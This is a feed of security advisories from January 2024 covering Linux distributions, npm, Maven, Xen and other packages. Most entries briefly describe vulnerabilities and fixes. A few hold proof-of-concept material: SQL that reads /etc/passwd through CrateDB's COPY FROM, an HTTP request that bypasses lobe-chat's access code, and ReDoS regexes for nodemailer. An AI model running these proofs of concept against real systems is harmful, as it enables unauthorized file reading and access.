30.01.2024 00:29:39	maven	[MAVEN:GHSA-3VVC-V8C2-43R7] Apache Kylin has Insufficiently Protected Credentials (moderate)	In Apache Kylin version 2.0.0 to 4.0.3, there is a Server Config web interface that displays the content of file 'kylin.properties', that may contain serverside credentials. When the kylin service runs over HTTP (or other plain text protocol), it is possible for network sniffers to hijack the HTTP payload and get access to the content of kylin.properties and potentially the containing credentials.To avoid this threat, users are recommended to * Always turn on HTTPS so that network payload is encrypted. * Avoid putting credentials in kylin.properties, or at least not in plain text. * Use network firewalls to protect the serverside such that it is not accessible to external attackers. * Upgrade to version Apache Kylin 4.0.4, which filters out the sensitive content that goes to the Server Config web interface.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3VVC-V8C2-43R7
29.01.2024 13:21:22	ubuntu	[USN-6610-1] Firefox vulnerabilities (high)	Several security issues were fixed in Firefox.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6610-1
29.01.2024 13:15:07	alpinelinux	[ALPINE:CVE-2023-46838] linux-lts vulnerability	[From CVE-2023-46838] Transmit requests in Xen's virtual network protocol can consist ofmultiple parts. While not really useful, except for the initial partany of them may be of zero length, i.e. carry no data at all. Besides acertain initial portion of the to be transferred data, these parts aredirectly translated into what Linux calls SKB fragments. Such convertedrequest parts can, when for a particular SKB they are all of lengthzero, lead to a de-reference of NULL in core networking code.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-46838
29.01.2024 12:52:45	ubuntu	[USN-6611-1] Exim vulnerability (medium)	Exim could be made to bypass an SPF protection mechanism if it receiveda specially crafted request.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6611-1
29.01.2024 02:00:00	debian	[DSA-5610-1] redis (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5610-1
29.01.2024 02:00:00	redhat	[RHSA-2024:0539] tomcat security update (important)	Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.Security Fix(es):* tomcat: HTTP request smuggling via malformed trailer headers (CVE-2023-46589)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0539
29.01.2024 02:00:00	redhat	[RHSA-2024:0533] gnutls security update (moderate)	The gnutls packages provide the GNU Transport Layer Security (GnuTLS) library, which implements cryptographic algorithms and protocols such as SSL, TLS, and DTLS.Security Fix(es):* gnutls: timing side-channel in the RSA-PSK authentication (CVE-2023-5981)* gnutls: incomplete fix for CVE-2023-5981 (CVE-2024-0553)* gnutls: rejects certificate chain with distributed trust (CVE-2024-0567)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0533
30.01.2024 00:30:31	maven	[MAVEN:GHSA-4HRP-M3F2-643J] Session fixation in Enonic XP (critical)	Enonic XP versions less than 7.7.4 are vulnerable to a session fixation issue. An remote and unauthenticated attacker can use prior sessions due to the lack of invalidating session attributes.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4HRP-M3F2-643J
30.01.2024 00:30:44	maven	[MAVEN:GHSA-F4QF-M5GF-8JM8] Generation of Error Message Containing Sensitive Information (moderate)	Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F4QF-M5GF-8JM8
30.01.2024 23:18:15	ubuntu	[USN-6609-2] Linux kernel (NVIDIA) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6609-2
30.01.2024 22:57:50	npm	[NPM:GHSA-RV8P-RR2H-FGPG] @apollo/experimental-nextjs-app-support Cross-site Scripting vulnerability (high)	### ImpactThe @apollo/experimental-apollo-client-nextjs NPM package is vulnerable to a cross-site scripting vulnerability. This vulnerability arises from improper handling of untrusted input when @apollo/experimental-apollo-client-nextjs performs server-side rendering of HTML pages. To fix this vulnerability, we implemented appropriate escaping to prevent javascript injection into rendered pages.### PatchesTo fix this issue, please update to version 0.7.0 or later.### WorkaroundsThere are no known workarounds for this issue. Please update to version 0.7.0	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RV8P-RR2H-FGPG
30.01.2024 22:57:30	npm	[NPM:GHSA-QHJF-HM5J-335W] @urql/next Cross-site Scripting vulnerability (high)	## impactThe `@urql/next` package is vulnerable to XSS. To exploit this an attacker would need to ensure that the response returns `html` tags and that the web-application is using streamed responses (non-RSC). This vulnerability is due to improper escaping of html-like characters in the response-stream.To fix this vulnerability upgrade to version 1.1.1	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QHJF-HM5J-335W
30.01.2024 23:34:05	npm	[NPM:GHSA-997G-27X8-43RF] react-query-streamed-hydration Cross-site Scripting vulnerability (high)	### ImpactThe `@tanstack/react-query-next-experimental` NPM package is vulnerable to a cross-site scripting vulnerability. To exploit this, an attacker would need to either inject malicious input or arrange to have malicious input be returned from an endpoint.This vulnerability arises from improper handling of untrusted input when `@tanstack/react-query-next-experimental` performs server-side rendering of HTML pages. To fix this vulnerability, we implemented appropriate escaping to prevent javascript injection into rendered pages.### PatchesTo fix this issue, please update to version 5.18.0 or later.### WorkaroundsThere are no known workarounds for this issue. Please update to version 5.18.0 or later.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-997G-27X8-43RF
30.01.2024 22:57:20	maven	[MAVEN:GHSA-475G-VJ6C-XF96] CrateDB database has an arbitrary file read vulnerability (moderate)	### SummaryThere is an arbitrary file read vulnerability in the CrateDB database, and authenticated CrateDB database users can read any file on the system.### DetailsThere is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.### PoC```CREATE TABLE info_leak(info_leak STRING);COPY info_leak FROM '/etc/passwd' with (format='csv', header=false); or COPY info_leak FROM '/crate/config/crate.yml' with (format='csv', header=false);SELECT * FROM info_leak;```![image](https://user-images.githubusercontent.com/154296962/292985975-ff5f2fb8-1a3f-4b49-9951-cd1fc6e78031.png)### ImpactThis vulnerability affects all current versions of the CrateDB database. Attackers who exploit this vulnerability to obtain sensitive information may carry out further attacks, while also affecting CrateDB Cloud Clusters.![image](https://user-images.githubusercontent.com/154296962/292986215-aec5adfe-38cc-4f31-bf86-c50ecbb44d5d.png)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-475G-VJ6C-XF96
30.01.2024 17:17:54	ubuntu	[USN-6618-1] Pillow vulnerabilities (high)	Several security issues were fixed in Pillow.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6618-1
30.01.2024 16:17:08	ubuntu	[USN-6617-1] libde265 vulnerabilities (high)	Several security issues were fixed in libde265.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6617-1
30.01.2024 14:50:20	ubuntu	[USN-6587-3] X.Org X Server regression	A regression was fixed in X.Org X Server	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6587-3
30.01.2024 14:42:51	ubuntu	[USN-6616-1] OpenLDAP vulnerability (high)	OpenLDAP could be made to crash if it received specially crafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6616-1
30.01.2024 14:38:24	ubuntu	[USN-6615-1] MySQL vulnerabilities (medium)	Several security issues were fixed in MySQL.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6615-1
30.01.2024 14:00:00	xen	[XSA-449] pci: phantom functions assigned to incorrect contexts	ISSUE DESCRIPTIONPCI devices can make use of a functionality called phantom functions,that when enabled allows the device to generate requests using the IDsof functions that are otherwise unpopulated. This allows a device toextend the number of outstanding requests.Such phantom functions need an IOMMU context setup, but failure tosetup the context is not fatal when the device is assigned. Notfailing device assignment when such failure happens can lead to theprimary device being assigned to a guest, while some of the phantomfunctions are assigned to a different domain.IMPACTUnder certain circumstances a malicious guest assigned a PCI devicewith phantom functions may be able to access memory from a previousowner of the device.VULNERABLE SYSTEMSSystems running all version of Xen are affected.Only x86 systems are vulnerable. Arm systems are not vulnerable.Only systems using PCI passthrough of devices with phantom functionsare affected.	https://secdb.nttzen.cloud/security-advisory/xen/XSA-449
30.01.2024 14:00:00	xen	[XSA-450] VT-d: Failure to quarantine devices in !HVM builds	ISSUE DESCRIPTIONIncorrect placement of a preprocessor directive in source code resultsin logic that doesn't operate as intended when support for HVM guests iscompiled out of Xen.IMPACTWhen a device is removed from a domain, it is not properly quarantinedand retains its access to the domain to which it was previouslyassigned.VULNERABLE SYSTEMSXen 4.17 and onwards are vulnerable. Xen 4.16 and older are notvulnerable.Only Xen running on x86 platforms with an Intel-compatible VT-d IOMMU isvulnerable. Platforms from other manufacturers, or platforms without aVT-d IOMMU are not vulnerable.Only systems where PCI devices are passed through to untrusted orsemi-trusted guests are vulnerable. Systems which do not assign PCIdevices to untrusted guests are not vulnerable.Xen is only vulnerable when CONFIG_HVM is disabled at build time. Mostdeployments of Xen are expected to have CONFIG_HVM enabled at buildtime, and would therefore not be vulnerable.	https://secdb.nttzen.cloud/security-advisory/xen/XSA-450
30.01.2024 12:36:10	ubuntu	[USN-6614-1] amanda vulnerability (high)	amanda could be used to escalate privilege if it was provided with specially crafted arguments.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6614-1
30.01.2024 10:00:00	msrc	[MS:CVE-2024-21388] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21388
30.01.2024 20:43:06	npm	[NPM:GHSA-VVH2-82C7-PPFG] network Arbitrary Command Injection vulnerability (high)	Versions of the package network before 0.7.0 are vulnerable to Arbitrary Command Injection due to use of the `child_process` exec function without input sanitization. If (attacker-controlled) user input is given to the `mac_address_for` function of the package, it is possible for an attacker to execute arbitrary commands on the operating system that this package is being run on.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VVH2-82C7-PPFG
30.01.2024 20:43:27	maven	[MAVEN:GHSA-7MGX-GVJW-M3W3] CrateDB authentication bypass vulnerability (moderate)	CrateDB 5.5.1 is contains an authentication bypass vulnerability in the Admin UI component. After configuring password authentication and_ Local_ In the case of an address, identity authentication can be bypassed by setting the X-Real IP request header to a specific value and accessing the Admin UI directly using the default user identity.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7MGX-GVJW-M3W3
30.01.2024 20:44:28	npm	[NPM:GHSA-8XW6-9H78-C89J] Ylianst MeshCentral Missing SSL Certificate Validation (moderate)	Ylianst MeshCentral 1.1.16 is vulnerable to Missing SSL Certificate Validation.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8XW6-9H78-C89J
30.01.2024 02:00:00	debian	[DSA-5611-1] glibc	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5611-1
30.01.2024 02:00:00	redhat	[RHSA-2024:0606] openssh security update (moderate)	OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.Security Fix(es):* ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795)* openssh: potential command injection via shell metacharacters (CVE-2023-51385)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0606
30.01.2024 02:00:00	redhat	[RHSA-2024:0600] firefox security update (important)	Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.7.0 ESR.Security Fix(es):* Mozilla: Out of bounds write in ANGLE (CVE-2024-0741)* Mozilla: Failure to update user input timestamp (CVE-2024-0742)* Mozilla: Crash when listing printers on Linux (CVE-2024-0746)* Mozilla: Bypass of Content Security Policy when directive unsafe-inline was set (CVE-2024-0747)* Mozilla: Phishing site popup could show local origin in address bar (CVE-2024-0749)* Mozilla: Potential permissions request bypass via clickjacking (CVE-2024-0750)* Mozilla: Privilege escalation through devtools (CVE-2024-0751)* Mozilla: HSTS policy on subdomain could bypass policy of upper domain (CVE-2024-0753)* Mozilla: Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 (CVE-2024-0755)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0600
30.01.2024 02:00:00	redhat	[RHSA-2024:0601] thunderbird security update (important)	Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.7.0.Security Fix(es):* Mozilla: Out of bounds write in ANGLE (CVE-2024-0741)* Mozilla: Failure to update user input timestamp (CVE-2024-0742)* Mozilla: Crash when listing printers on Linux (CVE-2024-0746)* Mozilla: Bypass of Content Security Policy when directive unsafe-inline was set (CVE-2024-0747)* Mozilla: Phishing site popup could show local origin in address bar (CVE-2024-0749)* Mozilla: Potential permissions request bypass via clickjacking (CVE-2024-0750)* Mozilla: Privilege escalation through devtools (CVE-2024-0751)* Mozilla: HSTS policy on subdomain could bypass policy of upper domain (CVE-2024-0753)* Mozilla: Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 (CVE-2024-0755)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0601
30.01.2024 02:00:00	redhat	[RHSA-2024:0607] tigervnc security update (important)	Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816)* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0607
30.01.2024 02:00:00	redhat	[RHSA-2024:0608] firefox security update (important)	Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.7.0 ESR.Security Fix(es):* Mozilla: Out of bounds write in ANGLE (CVE-2024-0741)* Mozilla: Failure to update user input timestamp (CVE-2024-0742)* Mozilla: Crash when listing printers on Linux (CVE-2024-0746)* Mozilla: Bypass of Content Security Policy when directive unsafe-inline was set (CVE-2024-0747)* Mozilla: Phishing site popup could show local origin in address bar (CVE-2024-0749)* Mozilla: Potential permissions request bypass via clickjacking (CVE-2024-0750)* Mozilla: Privilege escalation through devtools (CVE-2024-0751)* Mozilla: HSTS policy on subdomain could bypass policy of upper domain (CVE-2024-0753)* Mozilla: Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 (CVE-2024-0755)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0608
30.01.2024 02:00:00	redhat	[RHSA-2024:0609] thunderbird security update (important)	Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.7.0.Security Fix(es):* Mozilla: Out of bounds write in ANGLE (CVE-2024-0741)* Mozilla: Failure to update user input timestamp (CVE-2024-0742)* Mozilla: Crash when listing printers on Linux (CVE-2024-0746)* Mozilla: Bypass of Content Security Policy when directive unsafe-inline was set (CVE-2024-0747)* Mozilla: Phishing site popup could show local origin in address bar (CVE-2024-0749)* Mozilla: Potential permissions request bypass via clickjacking (CVE-2024-0750)* Mozilla: Privilege escalation through devtools (CVE-2024-0751)* Mozilla: HSTS policy on subdomain could bypass policy of upper domain (CVE-2024-0753)* Mozilla: Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 (CVE-2024-0755)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0609
30.01.2024 02:00:00	redhat	[RHSA-2024:0557] tigervnc security update (important)	Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816)* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0557
30.01.2024 02:00:00	redhat	[RHSA-2024:0602] thunderbird security update (important)	Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.7.0.Security Fix(es):* Mozilla: Out of bounds write in ANGLE (CVE-2024-0741)* Mozilla: Failure to update user input timestamp (CVE-2024-0742)* Mozilla: Crash when listing printers on Linux (CVE-2024-0746)* Mozilla: Bypass of Content Security Policy when directive unsafe-inline was set (CVE-2024-0747)* Mozilla: Phishing site popup could show local origin in address bar (CVE-2024-0749)* Mozilla: Potential permissions request bypass via clickjacking (CVE-2024-0750)* Mozilla: Privilege escalation through devtools (CVE-2024-0751)* Mozilla: HSTS policy on subdomain could bypass policy of upper domain (CVE-2024-0753)* Mozilla: Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 (CVE-2024-0755)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0602
30.01.2024 02:00:00	redhat	[RHSA-2024:0603] firefox security update (important)	Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.7.0 ESR.Security Fix(es):* Mozilla: Out of bounds write in ANGLE (CVE-2024-0741)* Mozilla: Failure to update user input timestamp (CVE-2024-0742)* Mozilla: Crash when listing printers on Linux (CVE-2024-0746)* Mozilla: Bypass of Content Security Policy when directive unsafe-inline was set (CVE-2024-0747)* Mozilla: Phishing site popup could show local origin in address bar (CVE-2024-0749)* Mozilla: Potential permissions request bypass via clickjacking (CVE-2024-0750)* Mozilla: Privilege escalation through devtools (CVE-2024-0751)* Mozilla: HSTS policy on subdomain could bypass policy of upper domain (CVE-2024-0753)* Mozilla: Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 (CVE-2024-0755)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0603
01.02.2024 00:42:56	npm	[NPM:GHSA-9H6G-PR28-7CQP] nodemailer ReDoS when trying to send a specially crafted email (moderate)	### SummaryA ReDoS vulnerability occurs when nodemailer tries to parse img files with the parameter `attachDataUrls` set, causing the stuck of event loop. Another flaw was found when nodemailer tries to parse an attachments with a embedded file, causing the stuck of event loop. ### DetailsRegex: /^data:((?:[^;];)(?:[^,])),(.)$/Path: compile -> getAttachments -> _processDataUrlRegex: /(<img\b[^>]* src\s=[\s"'])(data:([^;]+);[^"'>\s]+)/Path: _convertDataImages### PoChttps://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6https://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698### ImpactReDoS causes the event loop to stuck a specially crafted evil email can cause this problem.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9H6G-PR28-7CQP
31.01.2024 23:25:31	slackware	[SSA:2024-031-01] sendmail (medium)	New sendmail packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```extra/sendmail/sendmail-8.18.1-i586-1_slack15.0.txz: Upgraded. sendmail through 8.17.2 allows SMTP smuggling in certain configurations. Remote attackers can use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism. This occurs because sendmail supports <LF>.<CR><LF> but some other popular e-mail servers do not. This is resolved in 8.18 and later versions with 'o' in srv_features. For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-51765 (* Security fix )extra/sendmail/sendmail-cf-8.18.1-noarch-1_slack15.0.txz: Upgraded.```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated packages for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/extra/sendmail/sendmail-8.18.1-i586-1_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/extra/sendmail/sendmail-cf-8.18.1-noarch-1_slack15.0.txzUpdated packages for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/extra/sendmail/sendmail-8.18.1-x86_64-1_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/extra/sendmail/sendmail-cf-8.18.1-noarch-1_slack15.0.txzUpdated packages for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/extra/sendmail/sendmail-8.18.1-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/extra/sendmail/sendmail-cf-8.18.1-noarch-1.txzUpdated packages for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/extra/sendmail/sendmail-8.18.1-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/extra/sendmail/sendmail-cf-8.18.1-noarch-1.txzMD5 signaturesSlackware 15.0 packages:c3476bc08a89961b1bd85aa41fe0399e sendmail-8.18.1-i586-1_slack15.0.txzda65abecc807b6af76f1f5f23545c426 sendmail-cf-8.18.1-noarch-1_slack15.0.txzSlackware x86_64 15.0 packages:bd5bb1d3ec4e26829eb59361ed1e46cb sendmail-8.18.1-x86_64-1_slack15.0.txz716fb38618dc85bf5704fa33c1086d2b sendmail-cf-8.18.1-noarch-1_slack15.0.txzSlackware -current packages:e7b502527dfbc9050a4c78cdc266e408 sendmail-8.18.1-i586-1.txz603bcf2ecc861ea275f002636c259c4c sendmail-cf-8.18.1-noarch-1.txzSlackware x86_64 -current packages:38c56928fa6feb1709c84405e60b6f72 sendmail-8.18.1-x86_64-1.txz5fc24831c13249281202717e17e70bae sendmail-cf-8.18.1-noarch-1.txzInstallation instructionsUpgrade the packages as root:`# upgradepkg sendmail-.txz`Then, restart sendmail:`# sh /etc/rc.d/rc.sendmail restart`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-031-01
31.01.2024 22:17:00	ubuntu	[USN-6619-1] runC vulnerability (high)	runC could be made to expose sensitive information or allow to escapecontianers.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6619-1
31.01.2024 22:25:38	npm	[NPM:GHSA-PF55-FJ96-XF37] @lobehub/chat vulnerable to unauthorized access to plugins (moderate)	### Description:When the application is password-protected (deployed with the `ACCESS_CODE` option), it is possible to access plugins without proper authorization (without password).### Proof-of-Concept:Let’s suppose that application has been deployed with following command:```sudo docker run -d -p 3210:3210 -e OPENAI_API_KEY=sk-[REDACTED] -e ACCESS_CODE=TEST123 --name lobe-chat lobehub/lobe-chat```Due to the utilization of the `ACCESS_CODE`, access to the chat is possible only after entering the password: ![image](https://raw.githubusercontent.com/dastaj/assets/main/others/image.png)However, it is possible to interact with chat plugins without entering the `ACCESS_CODE`. Example HTTP request:```POST /api/plugin/gateway HTTP/1.1Host: localhost:3210Content-Length: 1276{"apiName":"checkWeatherUsingGET","arguments":"{\n \"location\": \"London\"\n}","identifier":"WeatherGPT","type":"default","manifest":{"api":[{"description":"Get current weather information","name":"checkWeatherUsingGET","parameters":{"properties":{"location":{"type":"string"}},"required":["location"],"type":"object"}}],"homepage":"https://weathergpt.vercel.app/legal","identifier":"WeatherGPT","meta":{"avatar":"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/logo.webp","description":"Get current weather information for a specific location.","title":"WeatherGPT"},"openapi":"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/openapi.json","systemRole":"Use the WeatherGPT plugin to automatically fetch current weather information for a specific location when it's being generated by the ChatGPT assistant. The plugin will return weather data, including temperature, wind speed, humidity, and other relevant information, as well as a link to a page that has all the information. Links will always be returned and should be shown to the user. The weather data can be used to provide users with up-to-date and accurate weather information for their desired location.","type":"default","version":"1","settings":{"properties":{},"type":"object"}}}```HTTP response:```HTTP/1.1 200 OK[...]{"location":{"name":"London","region":"City of London, Greater London","country":"United Kingdom","lat":51.52,"lon":-0.11,"tz_id":"Europe/London","localtime_epoch":1706379026,"localtime":"2024-01-27 18:10"},"current":{"last_updated_epoch":1706378400,"last_updated":"2024-01-27 18:00","temp_c":6,"temp_f":42.8,"is_day":0,"condition":{"text":"Clear","icon":"//cdn.weatherapi.com/weather/64x64/night/113.png","code":1000},"wind_mph":4.3,"wind_kph":6.8,"wind_degree":170,"wind_dir":"S","pressure_mb":1031,"pressure_in":30.45,"precip_mm":0,"precip_in":0,"humidity":81,"cloud":0,"feelslike_c":3.8,"feelslike_f":38.9,"vis_km":10,"vis_miles":6,"uv":1,"gust_mph":9.5,"gust_kph":15.3},"infoLink":"https://weathergpt.vercel.app/London"}```### Remediation:Verify the `ACCESS_CODE` for HTTP requests to the `/api/plugin/:` route.### Impact:Unauthorized access to plugins.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PF55-FJ96-XF37
31.01.2024 15:34:03	ubuntu	[USN-6591-2] Postfix update (medium)	Postfix could allow bypass of email authentication if it receivedspecially crafted network traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6591-2
31.01.2024 20:07:41	maven	[MAVEN:GHSA-P6RP-MX85-M459] Spring Cloud Contract vulnerable to local information disclosure (low)	In Spring Cloud Contract, versions 4.1.x prior to 4.1.1, versions 4.0.x prior to 4.0.5, and versions 3.1.x prior to 3.1.10, test execution is vulnerable to local information disclosure via temporary directory created with unsafe permissions through the shaded com.google.guava:guava dependency in the org.springframework.cloud:spring-cloud-contract-shade dependency.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P6RP-MX85-M459
31.01.2024 10:15:42	alpinelinux	[ALPINE:CVE-2024-23170] mbedtls vulnerability	[From CVE-2024-23170] An issue was discovered in Mbed TLS 2.x before 2.28.7 and 3.x before 3.5.2. There was a timing side channel in RSA private operations. This side channel could be sufficient for a local attacker to recover the plaintext. It requires the attacker to send a large number of messages for decryption, as described in "Everlasting ROBOT: the Marvin Attack" by Hubert Kario.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-23170
31.01.2024 10:15:42	alpinelinux	[ALPINE:CVE-2024-23775] mbedtls vulnerability	[From CVE-2024-23775] Integer Overflow vulnerability in Mbed TLS 2.x before 2.28.7 and 3.x before 3.5.2, allows attackers to cause a denial of service (DoS) via mbedtls_x509_set_extension().	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-23775
31.01.2024 10:07:21	curl	[CURL-CVE-2024-0853] OCSP verification bypass with TLS session reuse (low)	curl inadvertently kept the SSL session ID for connections in its cache evenwhen the verify status (OCSP stapling) test failed. A subsequent transfer tothe same hostname could then succeed if the session ID cache was still fresh,which then skipped the verify status check.	https://secdb.nttzen.cloud/security-advisory/curl/CURL-CVE-2024-0853
31.01.2024 02:00:00	cisa	[CISA-2024:0131] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (high)	CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0131
31.01.2024 02:00:00	gentoo	[GLSA-202401-32] libaom: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in libaom, the worst of which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-32
31.01.2024 02:00:00	gentoo	[GLSA-202401-30] X.Org X Server, XWayland: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in the Xorg Server and XWayland, the worst of which can result in privilege escalation or remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-30
31.01.2024 02:00:00	gentoo	[GLSA-202401-31] containerd: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been found in containerd, the worst of which could result in privilege escalation.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-31
31.01.2024 02:00:00	gentoo	[GLSA-202401-33] WebKitGTK+: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been found in WebKitGTK+, the worst of which may lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-33
